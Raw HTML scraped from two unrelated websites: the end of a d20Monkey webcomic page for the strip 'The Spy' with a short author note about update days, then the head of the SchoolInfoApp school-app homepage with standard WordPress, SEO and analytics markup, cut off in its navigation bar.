src="http://www.d20monkey.com/wp-content/uploads/2012/12/d20_logo_new.png" /></a></div> <div style="padding-top: 2px;"> <p><a href="http://www.evilhat.com/home/karthun/" target="_blank" rel="noopener"><img src="http://www.d20monkey.com/wp-content/uploads/2018/04/Karthun_Sale_Ad2.jpg" alt="Custom Text" /></a></p> <p>&nbsp;</p> </div> <div style="background: #000000; float: right 100PX; margin: 0 auto; padding-bottom: 5px; padding-top: 5px; padding-left: 150px; width: 1300px;"> <p><a href="http://www.d20monkey.com/meet-the-cast/"><img style="border: none; padding-left: 5PX;" src="http://www.d20monkey.com/wp-content/uploads/2018/04/ABOUT_BUTTON.png" border="0" /></a><a href="http://www.d20monkey.com/archive/"><img style="border: none; padding-right: 10PX;" src="http://www.d20monkey.com/wp-content/uploads/2018/04/ARCHIVE_BUTTON.png" border="0" /></a><a href="https://www.teepublic.com/stores/d20monkey?ref_id=3586"><img style="border: none; padding-right: 10PX;" src="http://www.d20monkey.com/wp-content/uploads/2018/04/STORE_BUTTON.png" border="0" /></a><a href="http://www.facebook.com/pages/D20monkey/120227821386322"><img style="border: none; padding-right: 10PX;" src="http://www.d20monkey.com/wp-content/uploads/2018/04/FANPAGE_BUTTON.png" border="0" /></a><a href="https://twitter.com/d20monkey"><img style="border: none; padding-right: 10PX;" src="http://www.d20monkey.com/wp-content/uploads/2018/04/TWITTER_BUTTON.png" border="0" /></a><a href="mailto:[email protected]"><img style="border: none; padding-right: 10PX;" src="http://www.d20monkey.com/wp-content/uploads/2018/04/CONTACT_BUTTON.png" border="0" /></a></p> </div> </div> </div> </div> <div class="clear"></div> </div> <div class="clear"></div> </div> <div class="clear"></div> </div> <div id="content-wrapper"> <div id="comic-wrap" class="comic-id-3581"> <div id="comic-head"> </div> <div class="comic-table"> <div id="comic"> <img src="http://www.d20monkey.com/wp-content/uploads/2019/05/20190515.jpg" alt="FELINE FINE, guys! " title="FELINE FINE, guys! " /> </div> </div> <div id="sidebar-under-comic" class="sidebar"> <div class="comic_navi_wrapper"> <table class="comic_navi"> <tr> <td class="comic_navi_left"> <a href="http://www.d20monkey.com/comic/scraggin-me-down/" class="navi navi-first" title=""></a> <a href="http://www.d20monkey.com/comic/the-letter/" class="navi comic-nav-previous navi-prev" title=""></a> </td> <td class="comic_navi_center"> </td> <td class="comic_navi_right"> <span class="navi navi-next navi-void">Next &gt;</span> <span class="navi navi-last navi-void">Last &gt;&gt;</span> </td> </tr> </table> </div> </div> <div id="comic-foot"> </div> <div class="clear"></div> </div> <div id="subcontent-wrapper"> <div id="sidebar-left"> <div class="sidebar"> <div id="text-65" class="widget widget_text"> <div class="widget-content"> <div class="textwidget"><script>(function() { if (!window.mc4wp) { window.mc4wp = { listeners: [], forms : { on: function (event, callback) { window.mc4wp.listeners.push({ event : event, callback: callback }); } } } } })(); </script><!-- Mailchimp for WordPress v4.3.3 - https://wordpress.org/plugins/mailchimp-for-wp/ --><form id="mc4wp-form-1" class="mc4wp-form mc4wp-form-2562 mc4wp-form-basic" method="post" data-id="2562" data-name="Default sign-up form" ><div class="mc4wp-form-fields"><p> <label><strong>Join the d20Monkey Mailing List!</strong>: </label> <input type="email" id="mc4wp_email" name="EMAIL" placeholder="Your email address" required /> </p> <p> <input type="submit" value="Sign up" /> </p></div><label style="display: none !important;">Leave this field empty if you're human: <input type="text" name="_mc4wp_honeypot" value="" tabindex="-1" autocomplete="off" /></label><input type="hidden" name="_mc4wp_timestamp" value="1558021325" /><input type="hidden" name="_mc4wp_form_id" value="2562" /><input type="hidden" name="_mc4wp_form_element_id" value="mc4wp-form-1" /><div class="mc4wp-response"></div></form><!-- / Mailchimp for WordPress Plugin --></div> </div> <div class="clear"></div> </div> <div id="search-2" class="widget widget_search"> <div class="widget-content"> <form method="get" class="searchform" action="http://www.d20monkey.com"> <input type="text" value="Search..." name="s" class="s-search" onfocus="this.value=(this.value=='Search...') ? '' : this.value;" onblur="this.value=(this.value=='') ? 'Search...' : this.value;" /> <button type="submit">&raquo;</button> </form> <div class="clear"></div></div> <div class="clear"></div> </div> <div id="media_image-6" class="widget widget_media_image"> <div class="widget-content"> <a href="https://www.patreon.com/d20monkey" target="_blank"><img width="225" height="603" src="http://www.d20monkey.com/wp-content/uploads/2018/10/Sidebar-Profile-Banner-2-382x1024.png" class="image wp-image-3389 attachment-225x603 size-225x603" alt="" style="max-width: 100%; height: auto;" srcset="http://www.d20monkey.com/wp-content/uploads/2018/10/Sidebar-Profile-Banner-2-382x1024.png 382w, http://www.d20monkey.com/wp-content/uploads/2018/10/Sidebar-Profile-Banner-2-112x300.png 112w, http://www.d20monkey.com/wp-content/uploads/2018/10/Sidebar-Profile-Banner-2-768x2059.png 768w, http://www.d20monkey.com/wp-content/uploads/2018/10/Sidebar-Profile-Banner-2.png 800w" sizes="(max-width: 225px) 100vw, 225px" /></a></div> <div class="clear"></div> </div> <div id="media_image-5" class="widget widget_media_image"> <div class="widget-content"> <a href="https://www.patreon.com/d20monkeyStudios" target="_blank"><img width="225" height="603" src="http://www.d20monkey.com/wp-content/uploads/2018/04/Sidebar-Profile-Banner-382x1024.png" class="image wp-image-3212 attachment-225x603 size-225x603" alt="" style="max-width: 100%; height: auto;" srcset="http://www.d20monkey.com/wp-content/uploads/2018/04/Sidebar-Profile-Banner-382x1024.png 382w, http://www.d20monkey.com/wp-content/uploads/2018/04/Sidebar-Profile-Banner-112x300.png 112w, http://www.d20monkey.com/wp-content/uploads/2018/04/Sidebar-Profile-Banner-768x2059.png 768w, http://www.d20monkey.com/wp-content/uploads/2018/04/Sidebar-Profile-Banner.png 800w" sizes="(max-width: 225px) 100vw, 225px" /></a></div> <div class="clear"></div> </div> <div id="custom_html-2" class="widget_text widget widget_custom_html"> <div class="widget_text widget-content"> <div class="textwidget custom-html-widget"><center> <form action="https://www.paypal.com/cgi-bin/webscr" method="post" target="_top"> <input type="hidden" name="cmd" value="_s-xclick"/> <input type="hidden" name="hosted_button_id" value="NWSWP8WVQ3DJE"/> <input type="image" src="https://www.paypalobjects.com/en_US/i/btn/btn_donate_LG.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!"/> <img alt="" border="0" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" height="1"/> </form> </center></div></div> <div class="clear"></div> </div> </div> </div> <div id="content-column"> <div id="content" class="narrowcolumn"> <article id="post-3581" class="post-3581 comic type-comic status-publish has-post-thumbnail hentry chapters-season-nine characters-charlie characters-dallas characters-sam characters-trevor uentry postonpage-1 odd post-author-admin"> <div class="post-content"> <div class="post-info"> <h2 class="post-title"><a href="http://www.d20monkey.com/comic/the-spy/">The Spy</a></h2> <div class="post-text"> <div class="comic-post-info"><div class="comic-chapter">Chapter: <a href="http://www.d20monkey.com/chapter/season-nine/" rel="tag">Season Nine</a></div><div class="comic-characters">Characters: <a href="http://www.d20monkey.com/character/charlie/" rel="tag">Charlie</a>, <a href="http://www.d20monkey.com/character/dallas/" rel="tag">Dallas</a>, <a href="http://www.d20monkey.com/character/sam/" rel="tag">Sam</a>, <a href="http://www.d20monkey.com/character/trevor/" rel="tag">Trevor</a></div></div> </div> <div class="clear"></div> </div> <div class="clear"></div> <div class="entry"> <p><em>&#8220;The Cat&#8217;s Pajamas is great. I got a cute set of PJ&#8217;s for my little man Truffle and he is FELINE FINE!&#8221; &#8211; Jimmy Yelp</em></p> <p>You may have noticed that this page dropped on a Wednesday. I have decided to go back to Monday, Wednesday, and Friday updates. It is/was a goal of my Patreon page but to be honest, I just missed my characters and stories too much. I will do what it takes to make it happen.</p> <p>In the meantime, <a href="https://www.patreon.com/d20monkey">consider dropping me a dollar or two every month if you have the means.</a></p> <div class="clear"></div> </div> <div class="post-extras"> <div class="post-tags"></div> <div class="comment-link"> <a href="http://www.d20monkey.com/comic/the-spy/#comments"><span class="comment-balloon">14</span> Comments</a> </div> <div class="clear"></div> </div> </div> </article> <div id="blogheader"></div> </div> </div> <div class="clear"></div> </div> </div> <footer id="footer"> <div id="footer-sidebar-wrapper"> </div> <div class="clear"></div> <div id="footer-menubar-wrapper"> <div class="clear"></div> </div> <p class="copyright-info"> &copy;2010-2019 <a href="http://www.d20monkey.com">Brian Patterson</a> <span class="footer-pipe">|</span> Powered by <a href="http://wordpress.org/">WordPress</a> with <a href="http://frumph.net">ComicPress</a> <span class="footer-subscribe"><span class="footer-pipe">|</span> Subscribe: <a href="http://www.d20monkey.com/feed/">RSS</a> </span> <span class="footer-uptotop"><span class="footer-pipe">|</span> <a href="" onclick="scrollup(); return false;">Back to Top &uarr;</a></span> </p> </footer> </div> <!-- // #page --> </div> <!-- / #page-wrap --> <div style="display:none"> </div> <script>(function() {function addEventListener(element,event,handler) { if(element.addEventListener) { element.addEventListener(event,handler, false); } else if(element.attachEvent){ element.attachEvent('on'+event,handler); } }function maybePrefixUrlField() { if(this.value.trim() !== '' && this.value.indexOf('http') !== 0) { this.value = "http://" + this.value; } } var urlFields = document.querySelectorAll('.mc4wp-form input[type="url"]'); if( urlFields && urlFields.length > 0 ) { for( var j=0; j < urlFields.length; j++ ) { addEventListener(urlFields[j],'blur',maybePrefixUrlField); } }/* test if browser supports date fields */ var testInput = document.createElement('input'); testInput.setAttribute('type', 'date'); if( testInput.type !== 'date') { /* add placeholder & pattern to all date fields */ var dateFields = document.querySelectorAll('.mc4wp-form input[type="date"]'); for(var i=0; i<dateFields.length; i++) { if(!dateFields[i].placeholder) { dateFields[i].placeholder = 'YYYY-MM-DD'; } if(!dateFields[i].pattern) { dateFields[i].pattern = '[0-9]{4}-(0[1-9]|1[012])-(0[1-9]|1[0-9]|2[0-9]|3[01])'; } } } })();</script><script type='text/javascript' src='http://www.d20monkey.com/wp-content/plugins/comic-easel/js/keynav.js'></script> <script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201920'></script> <script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?ver=2019Mayaa'></script> <script type='text/javascript'> /* <![CDATA[ */ var WPGroHo = {"my_hash":""}; /* ]]> */ </script> <script type='text/javascript' src='http://www.d20monkey.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=6e4916f4f2da8abd31c186c03ad23485'></script> <script type='text/javascript' src='http://www.d20monkey.com/wp-content/themes/comicpress/js/scroll.js'></script> <script type='text/javascript' src='http://www.d20monkey.com/wp-includes/js/wp-embed.min.js?ver=6e4916f4f2da8abd31c186c03ad23485'></script> <script type='text/javascript'> /* <![CDATA[ */ var mc4wp_forms_config = []; /* ]]> */ </script> <script type='text/javascript' src='http://www.d20monkey.com/wp-content/plugins/mailchimp-for-wp/assets/js/forms-api.min.js?ver=4.3.3'></script> <!--[if lte IE 9]> <script type='text/javascript' src='http://www.d20monkey.com/wp-content/plugins/mailchimp-for-wp/assets/js/third-party/placeholders.min.js?ver=4.3.3'></script> <![endif]--> <script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'> _stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:7.1.1',blog:'80444026',post:'0',tz:'-5',srv:'www.d20monkey.com'} ]); _stq.push([ 'clickTrackerInit', '80444026', '0' ]); </script> </body> </html> <!-- Dynamic page generated in 0.853 seconds. --> <!-- Cached page generated by WP-Super-Cache on 2019-05-16 10:42:05 --> <!-- super cache -->
0
<!DOCTYPE html> <!--[if IE 9]><html class="no-js ie9" lang="en-US" prefix="og: http://ogp.me/ns#"><![endif]--> <!--[if gt IE 9]><!--><html class="no-js" lang="en-US" prefix="og: http://ogp.me/ns#"><!--<![endif]--> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>SchoolInfoApp | school mobile apps | apps for schools</title> <link rel="pingback" href="https://schoolinfoapp.com/xmlrpc.php"><link rel="shortcut icon" href="//schoolinfoapp.com/wp-content/uploads/2016/12/favicon-32x32.png"><link rel="apple-touch-icon-precomposed" href="//schoolinfoapp.com/wp-content/uploads/2016/12/apple-icon.png"><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="//schoolinfoapp.com/wp-content/uploads/2016/12/ms-icon-150x150.png"> <!-- This site is optimized with the Yoast SEO plugin v9.5 - https://yoast.com/wordpress/plugins/seo/ --> <link rel="canonical" href="https://schoolinfoapp.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="SchoolInfoApp | school mobile apps | apps for schools" /> <meta property="og:url" content="https://schoolinfoapp.com/" /> <meta property="og:site_name" content="SchoolInfoApp" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:title" content="SchoolInfoApp | school mobile apps | apps for schools" /> <meta name="twitter:site" content="@schoolinfoapp" /> <meta name="twitter:creator" content="@schoolinfoapp" /> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"WebSite","@id":"https://schoolinfoapp.com/#website","url":"https://schoolinfoapp.com/","name":"SchoolInfoApp","potentialAction":{"@type":"SearchAction","target":"https://schoolinfoapp.com/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"Organization","url":"https://schoolinfoapp.com/","sameAs":["https://www.facebook.com/schoolinfoapp","https://www.instagram.com/schoolinfoapp/","https://twitter.com/schoolinfoapp"],"@id":"https://schoolinfoapp.com/#organization","name":"SchoolInfoApp","logo":"https://schoolinfoapp.com/wp-content/uploads/2016/12/SIA_Logo.png"}</script> <meta name="google-site-verification" content="-8aPtAfnbcfAmq9bKt3_wNNVyRy3suESuihpJUZHpvY" /> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//platform-api.sharethis.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="SchoolInfoApp &raquo; Feed" href="https://schoolinfoapp.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="SchoolInfoApp &raquo; Comments Feed" href="https://schoolinfoapp.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/schoolinfoapp.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.0.4"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='mpsp-custom-style-css' href='https://schoolinfoapp.com/wp-content/plugins/testimonial-add-premium/css/custom_style.css?ver=5.0.4' type='text/css' media='all' /> <link rel='stylesheet' id='mpsp-style-css' href='https://schoolinfoapp.com/wp-content/plugins/testimonial-add-premium/owl-carousel/owl.carousel.css?ver=5.0.4' type='text/css' media='all' /> <link rel='stylesheet' id='mpsp_theme-css' href='https://schoolinfoapp.com/wp-content/plugins/testimonial-add-premium/owl-carousel/owl.theme.css?ver=5.0.4' type='text/css' media='all' /> <link rel='stylesheet' id='mpsp_transitions-css' href='https://schoolinfoapp.com/wp-content/plugins/testimonial-add-premium/owl-carousel/owl.transitions.css?ver=5.0.4' type='text/css' media='all' /> <link rel='stylesheet' id='wp-block-library-css' href='https://schoolinfoapp.com/wp-includes/css/dist/block-library/style.min.css?ver=5.0.4' type='text/css' media='all' /> <link rel='stylesheet' id='simple-job-board-google-fonts-css' href='https://fonts.googleapis.com/css?family=Roboto%3A100%2C100i%2C300%2C300i%2C400%2C400i%2C500%2C500i%2C700%2C700i%2C900%2C900i&#038;ver=2.4.6' type='text/css' media='all' /> <link rel='stylesheet' id='simple-job-board-font-awesome-css' href='https://schoolinfoapp.com/wp-content/plugins/simple-job-board/public/css/font-awesome.min.css?ver=4.7.0' type='text/css' media='all' /> <link rel='stylesheet' id='simple-job-board-jquery-ui-css' href='https://schoolinfoapp.com/wp-content/plugins/simple-job-board/public/css/jquery-ui.css?ver=1.12.1' type='text/css' media='all' /> <link rel='stylesheet' id='simple-job-board-frontend-css' href='https://schoolinfoapp.com/wp-content/plugins/simple-job-board/public/css/simple-job-board-public.css?ver=3.0.0' type='text/css' media='all' /> <link rel='stylesheet' id='uscanada-html5-map-style-css' href='https://schoolinfoapp.com/wp-content/plugins/uscanadahtmlmap/static/css/map.css?ver=5.0.4' type='text/css' media='all' /> <link rel='stylesheet' id='x-stack-css' href='https://schoolinfoapp.com/wp-content/themes/x/framework/css/dist/site/stacks/integrity-light.css?ver=4.6.1' type='text/css' media='all' /> <link rel='stylesheet' id='x-gravity-forms-css' href='https://schoolinfoapp.com/wp-content/themes/x/framework/css/dist/site/gravity_forms/integrity-light.css?ver=4.6.1' type='text/css' media='all' /> <link rel='stylesheet' id='x-google-fonts-css' href='//fonts.googleapis.com/css?family=Open+Sans%3A700%2C700italic%7CLato%3A700&#038;subset=latin%2Clatin-ext&#038;ver=4.6.1' type='text/css' media='all' /> <script>if (document.location.protocol != "https:") {document.location = document.URL.replace(/^http:/i, "https:");}</script><script type='text/javascript' src='https://schoolinfoapp.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://schoolinfoapp.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://schoolinfoapp.com/wp-content/plugins/testimonial-add-premium/owl-carousel/owl.carousel.js?ver=5.0.4'></script> <script type='text/javascript' src='https://schoolinfoapp.com/wp-content/plugins/charts-cornerstone/assets/vendor/chart.min.js?ver=5.0.4'></script> <script type='text/javascript' src='https://schoolinfoapp.com/wp-content/plugins/uscanadahtmlmap/static/js/jquery.nicescroll.js?ver=5.0.4'></script> <script type='text/javascript' src='https://schoolinfoapp.com/wp-content/themes/x/framework/js/dist/site/x-head.min.js?ver=4.6.1'></script> <script type='text/javascript' src='https://schoolinfoapp.com/wp-content/plugins/cornerstone/assets/dist/js/site/cs-head.js?ver=2.0.6'></script> <script type='text/javascript' src='//platform-api.sharethis.com/js/sharethis.js#product=ga'></script> <link rel='https://api.w.org/' href='https://schoolinfoapp.com/wp-json/' /> <link rel='shortlink' href='https://schoolinfoapp.com/' /> <link rel="alternate" type="application/json+oembed" href="https://schoolinfoapp.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fschoolinfoapp.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://schoolinfoapp.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fschoolinfoapp.com%2F&#038;format=xml" /> <!-- BEGIN GADWP v5.1.1.2 Universal Analytics - https://deconf.com/google-analytics-dashboard-wordpress/ --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-87274971-6', 'auto'); ga('send', 'pageview'); </script> <!-- END GADWP Universal Analytics --> <style id="x-generated-css" type="text/css">a,h1 a:hover,h2 a:hover,h3 a:hover,h4 a:hover,h5 a:hover,h6 a:hover,.x-topbar .p-info a:hover,.x-breadcrumb-wrap a:hover,.widget ul li a:hover,.widget ol li a:hover,.widget.widget_text ul li a,.widget.widget_text ol li a,.widget_nav_menu .current-menu-item > a,.x-widgetbar .widget ul li a:hover,.x-accordion-heading .x-accordion-toggle:hover,.x-comment-author a:hover,.x-comment-time:hover,.x-recent-posts a:hover .h-recent-posts{color:#3898ad;}a:hover,.widget.widget_text ul li a:hover,.widget.widget_text ol li a:hover,.x-twitter-widget ul li a:hover{color:#a3ca21;}.rev_slider_wrapper,a.x-img-thumbnail:hover,.x-slider-container.below,.page-template-template-blank-3-php .x-slider-container.above,.page-template-template-blank-6-php .x-slider-container.above{border-color:#3898ad;}.entry-thumb:before,.x-pagination span.current,.flex-direction-nav a,.flex-control-nav a:hover,.flex-control-nav a.flex-active,.mejs-time-current,.x-dropcap,.x-skill-bar .bar,.x-pricing-column.featured h2,.h-comments-title small,.x-entry-share .x-share:hover,.x-highlight,.x-recent-posts .x-recent-posts-img:after{background-color:#3898ad;}.x-nav-tabs > .active > a,.x-nav-tabs > .active > a:hover{box-shadow:inset 0 3px 0 0 #3898ad;}.x-main{width:69.536945%;}.x-sidebar{width:25.536945%;}.x-topbar .p-info,.x-topbar .p-info a,.x-navbar .desktop .x-nav > li > a,.x-navbar .desktop .sub-menu a,.x-navbar .mobile .x-nav li > a,.x-breadcrumb-wrap a,.x-breadcrumbs .delimiter{color:#999999;}.x-navbar .desktop .x-nav > li > a:hover,.x-navbar .desktop .x-nav > .x-active > a,.x-navbar .desktop .x-nav > .current-menu-item > a,.x-navbar .desktop .sub-menu a:hover,.x-navbar .desktop .sub-menu .x-active > a,.x-navbar .desktop .sub-menu .current-menu-item > a,.x-navbar .desktop .x-nav .x-megamenu > .sub-menu > li > a,.x-navbar .mobile .x-nav li > a:hover,.x-navbar .mobile .x-nav .x-active > a,.x-navbar .mobile .x-nav .current-menu-item > a{color:#272727;}.x-navbar .desktop .x-nav > li > a:hover,.x-navbar .desktop .x-nav > .x-active > a,.x-navbar .desktop .x-nav > .current-menu-item > a{box-shadow:inset 0 4px 0 0 #3898ad;}.x-navbar .desktop .x-nav > li > a{height:90px;padding-top:30px;}.x-navbar .desktop .x-nav > li ul{top:75px;;}.x-comment-author,.x-comment-time,.comment-form-author label,.comment-form-email label,.comment-form-url label,.comment-form-rating label,.comment-form-comment label,.widget_calendar #wp-calendar caption,.widget.widget_rss li .rsswidget{font-family:Open Sans;font-weight:700;}.p-landmark-sub,.p-meta,input,button,select,textarea{font-family:Open Sans;}.widget ul li a,.widget ol li a,.x-comment-time{color:#666666;}.widget_text ol li a,.widget_text ul li a{color:#3898ad;}.widget_text ol li a:hover,.widget_text ul li a:hover{color:#a3ca21;}.comment-form-author label,.comment-form-email label,.comment-form-url label,.comment-form-rating label,.comment-form-comment label,.widget_calendar #wp-calendar th,.p-landmark-sub strong,.widget_tag_cloud .tagcloud a:hover,.widget_tag_cloud .tagcloud a:active,.entry-footer a:hover,.entry-footer a:active,.x-breadcrumbs .current,.x-comment-author,.x-comment-author a{color:#3898ad;}.widget_calendar #wp-calendar th{border-color:#3898ad;}.h-feature-headline span i{background-color:#3898ad;}@media (max-width:979px){}body{font-size:14px;font-style:normal;font-weight:700;color:#666666;background-color:#ffffff;}a:focus,select:focus,input[type="file"]:focus,input[type="radio"]:focus,input[type="submit"]:focus,input[type="checkbox"]:focus{outline:thin dotted #333;outline:5px auto #3898ad;outline-offset:-1px;}h1,h2,h3,h4,h5,h6,.h1,.h2,.h3,.h4,.h5,.h6{font-family:"Open Sans",sans-serif;font-style:normal;font-weight:700;}h1,.h1{letter-spacing:-0.035em;}h2,.h2{letter-spacing:-0.035em;}h3,.h3{letter-spacing:-0.035em;}h4,.h4{letter-spacing:-0.035em;}h5,.h5{letter-spacing:-0.035em;}h6,.h6{letter-spacing:-0.035em;}.w-h{font-weight:700 !important;}.x-container.width{width:88%;}.x-container.max{max-width:1200px;}.x-main.full{float:none;display:block;width:auto;}@media (max-width:979px){.x-main.full,.x-main.left,.x-main.right,.x-sidebar.left,.x-sidebar.right{float:none;display:block;width:auto !important;}}.entry-header,.entry-content{font-size:14px;}body,input,button,select,textarea{font-family:"Open Sans",sans-serif;}h1,h2,h3,h4,h5,h6,.h1,.h2,.h3,.h4,.h5,.h6,h1 a,h2 a,h3 a,h4 a,h5 a,h6 a,.h1 a,.h2 a,.h3 a,.h4 a,.h5 a,.h6 a,blockquote{color:#3898ad;}.cfc-h-tx{color:#3898ad !important;}.cfc-h-bd{border-color:#3898ad !important;}.cfc-h-bg{background-color:#3898ad !important;}.cfc-b-tx{color:#666666 !important;}.cfc-b-bd{border-color:#666666 !important;}.cfc-b-bg{background-color:#666666 !important;}.x-navbar-inner{min-height:90px;}.x-brand{margin-top:10px;font-family:"Lato",sans-serif;font-size:42px;font-style:normal;font-weight:700;letter-spacing:-0.035em;color:#272727;}.x-brand:hover,.x-brand:focus{color:#272727;}.x-brand img{width:250px;}.x-navbar .x-nav-wrap .x-nav > li > a{font-family:"Lato",sans-serif;font-style:normal;font-weight:700;letter-spacing:0.085em;text-transform:uppercase;}.x-navbar .desktop .x-nav > li > a{font-size:13px;}.x-navbar .desktop .x-nav > li > a:not(.x-btn-navbar-woocommerce){padding-left:20px;padding-right:20px;}.x-navbar .desktop .x-nav > li > a > span{margin-right:-0.085em;}.x-btn-navbar{margin-top:20px;}.x-btn-navbar,.x-btn-navbar.collapsed{font-size:24px;}@media (max-width:979px){.x-widgetbar{left:0;right:0;}}.x-btn,.button,[type="submit"]{color:#666666;border-color:rgb(56,152,173);background-color:#ff2a13;border-width:3px;text-transform:uppercase;background-color:transparent;border-radius:0.25em;}.x-btn:hover,.button:hover,[type="submit"]:hover{color:#666666;border-color:#a3ca21;background-color:#ef2201;border-width:3px;text-transform:uppercase;background-color:transparent;}.x-btn.x-btn-real,.x-btn.x-btn-real:hover{margin-bottom:0.25em;text-shadow:0 0.075em 0.075em rgba(0,0,0,0.65);}.x-btn.x-btn-real{box-shadow:0 0.25em 0 0 #a71000,0 4px 9px rgba(0,0,0,0.75);}.x-btn.x-btn-real:hover{box-shadow:0 0.25em 0 0 #a71000,0 4px 9px rgba(0,0,0,0.75);}.x-btn.x-btn-flat,.x-btn.x-btn-flat:hover{margin-bottom:0;text-shadow:0 0.075em 0.075em rgba(0,0,0,0.65);box-shadow:none;}.x-btn.x-btn-transparent,.x-btn.x-btn-transparent:hover{margin-bottom:0;border-width:3px;text-shadow:none;text-transform:uppercase;background-color:transparent;box-shadow:none;}body .gform_wrapper .gfield_required,body .gform_wrapper span.ginput_total{color:#3898ad;}body .gform_wrapper h2.gsection_title,body .gform_wrapper h3.gform_title{font-weight:700;}body .gform_wrapper h2.gsection_title{letter-spacing:-0.035em !important;}body .gform_wrapper h3.gform_title{letter-spacing:-0.035em !important;}body .gform_wrapper .top_label .gfield_label,body .gform_wrapper .left_label .gfield_label,body .gform_wrapper .right_label .gfield_label{font-weight:700;}ul { list-style-type: none; } .x-colophon.bottom .x-social-global a { font-size: 50px; } #tss_warppper {border: #3898ad solid 1px; border-radius: 15px; width: 80% !important; } #tss_testimonial {line-height: 1.75em !important;} .x-accordion-inner {color: #666666 !important;} .gform_wrapper .ginput_complex label, body .gform_wrapper .description, body .gform_wrapper .gfield_description, body .gform_wrapper .gsection_description, body .gform_wrapper .instruction { font-family: inherit; font-size: 100%; opacity: .7; } .overlaybtn { color: #ffffff; border-color: #ffffff; } .overlaybtn:hover { color: #ffffff; border-color: #A2CA21; } .overlaybtnmbl { color: #ffffff; border-color: #ffffff; background:rgba(255,255,255,0.5); } .overlaybtnblue { color: #3898ad !important; border-color: ##3898ad; background:rgba(255,255,255,0.75); } .overlaybtnblue:hover { color: #A2CA21 !important; border-color: #A2CA21; background:rgba(255,255,255,0.75); } .x-feature-box-text { text-align: left; }</style><style id="cornerstone-custom-page-css" type="text/css"></style></head> <body data-rsssl=1 class="home page-template page-template-template-blank-4 page-template-template-blank-4-php page page-id-8 x-integrity x-integrity-light x-navbar-static-active x-full-width-layout-active x-full-width-active x-post-meta-disabled x x-v4_6_1 cornerstone-v2_0_6"> <div id="top" class="site"> <header class="masthead masthead-inline" role="banner"> <div class="x-navbar-wrap"> <div class="x-navbar"> <div class="x-navbar-inner"> <div class="x-container max width"> <h1 class="visually-hidden">SchoolInfoApp</h1> <a href="https://schoolinfoapp.com/" class="x-brand img" title="Great Apps for Great Districts and Schools"> <img src="//schoolinfoapp.com/wp-content/uploads/2017/05/SIA_Logo_.jpg" alt="Great Apps for Great Districts and Schools"></a> <a href="#" class="x-btn-navbar collapsed" 